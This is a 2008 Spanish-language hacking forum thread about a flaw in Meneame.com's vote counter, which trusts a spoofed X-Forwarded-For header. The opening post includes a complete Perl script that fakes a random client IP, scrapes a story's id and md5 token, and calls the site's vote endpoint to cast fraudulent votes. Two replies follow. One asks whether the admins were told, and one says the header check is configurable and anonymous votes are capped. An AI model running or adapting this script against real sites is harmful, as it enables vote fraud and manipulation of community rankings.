elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
27 Mayo 2012, 17:22  


Tema destacado: Personaliza-Escoge el diseño del foro que más te guste.

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado (Moderadores: ANELKAOS, TRICKY)
| | |-+  Bug COntador Meneame.Com NullBytes.net		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Bug COntador Meneame.Com NullBytes.net  (Leído 2,041 veces)
OzX


Desconectado Desconectado

Mensajes: 397


[NuKe] Team


Ver Perfil WWW
Bug COntador Meneame.Com NullBytes.net
« en: 23 Agosto 2008, 02:06 »
Bug en el Contador de Meneame.com


Wikipedia: Menéame es un sitio web basado en la participación comunitaria en el que los usuarios registrados envían historias que los demás usuarios del sitio (registrados o no) pueden votar, promoviendo las más votadas a la página principal. Como el modelo anglosajón en que se inspira (digg), combina Marcadores sociales, el blogging y la sindicación con un sistema de publicación sin editores.

    * Unos de los pilares fundamentales de este sistema es el sistema de “votaciones” de las noticias posteadas, si estas son alteras se puede obtener un  privilegio antes las otras entradas , para poder así estar siempre al tope de la lista, por ende tener mayor trafico hacia tu Web.
    * Falla: Mala Validación de la IP, hace que cuando modifiquemos la cabeza X-Forwarded-For , podamos saltarnos este filtro de restricción por IP.

    * Restricciones: Solo Puede Ser Alterada  las Entradas  que están en Portada.


Un Ejemplo de la Restriccion:




Ejemplo Del Codigo En Accion:



Resultado:



Código
#Meneador By OzX [NuKE/NullBytes] Labs 
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
 
unless ($ARGV[0]) {
	print "Meneador By OzX [NuKE/NullBytes] Labs \n";
	print "Script.pl <url>";
   exit 0;
}
 
$url = $ARGV[0];
 
 
$r1=int(rand(254));
$r2 =int(rand(254)); 
$r3= int(rand(254));
$r4= int(rand(254));
$proxy= "$r1.$r2.$r3.$r4";
 
@ns_headers = (
"User-Agent" => "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13",
"X-Forwarded-For" => $proxy,);
 
$browser = LWP::UserAgent->new;
$response = $browser->get($url, @ns_headers);
$contenido= $response->content();
@code = split("\n",$contenido);
 
foreach $cont (@code){
if($cont=~/(javascript:menealo)/){
push (@code2, "$cont");
}
}
@code3 = split("href=",$code2[0]);
@code4= split("'",$code3[2]);
@meneos= split("\">",$code3[1]);
@meneos1= split ("<\/",$meneos[1]);
@id1=split(",",$code4[0]);
$id=$id1[1];
 
 
$meneos_totales=$meneos1[0];
$url="http://meneame.net/backend/menealo.php?id=$id&user=0&md5=$code4[1]";
$response = $browser->get($url, @ns_headers);
 
print "md5 = $code4[1] Ip_Fake = $proxy Id = $id Meneos Totales = $meneos_totales"; 
 

OzX NullBytes.net
« Última modificación: 23 Agosto 2008, 02:10 por OzX » En línea
HTTP://FORO.UNDERSECURITY.NET
Newbie´s

Desconectado Desconectado

Mensajes: 20


Ver Perfil
Re: Bug COntador Meneame.Com NullBytes.net
« Respuesta #1 en: 23 Agosto 2008, 06:37 »
Y este Bug fue declarado hacia los Administradores del Sitio ???...

Saludos cordiales
En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Bug COntador Meneame.Com NullBytes.net
« Respuesta #2 en: 23 Agosto 2008, 23:58 »
En las configuraciones del sistema se puede habilitar el ignorar el "x-forwarded-for", ignoro porque lo deshabilitaron en meneame.net

De todas formas, hay un limite de votos anónimos.. por lo que tampoco les servirá a los que quieran promover sus noticias :P
« Última modificación: 24 Agosto 2008, 00:01 por sirdarckcat » En línea


Leer reglas
- WarZone.elhacker.net
- IRC de elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines